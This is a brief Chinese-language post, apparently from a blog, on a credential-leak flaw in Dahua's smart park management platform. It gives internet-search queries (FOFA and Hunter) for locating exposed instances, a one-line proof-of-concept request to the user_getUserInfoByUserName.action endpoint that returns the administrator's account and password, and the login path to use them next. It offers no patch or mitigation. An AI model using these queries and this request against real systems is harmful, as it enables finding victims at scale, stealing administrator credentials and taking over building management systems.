漏洞简介
大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口,导致管理园账号密码泄漏
漏洞复现
fofa语句:"/WPMS/asset/lib/gridster/"
或app="dahua-智慧园区综合管理平台"
鹰图语句:web.body="/WPMS/asset/lib/gridster/"
POC:
/admin/user_getUserInfoByUserName.action?userName=system
获取后访问地址
/admin/login_login.action
标签:漏洞,getUserInfoByUserName,user,action,账号密码,园区
From: https://www.cnblogs.com/pursue-security/p/17663930.html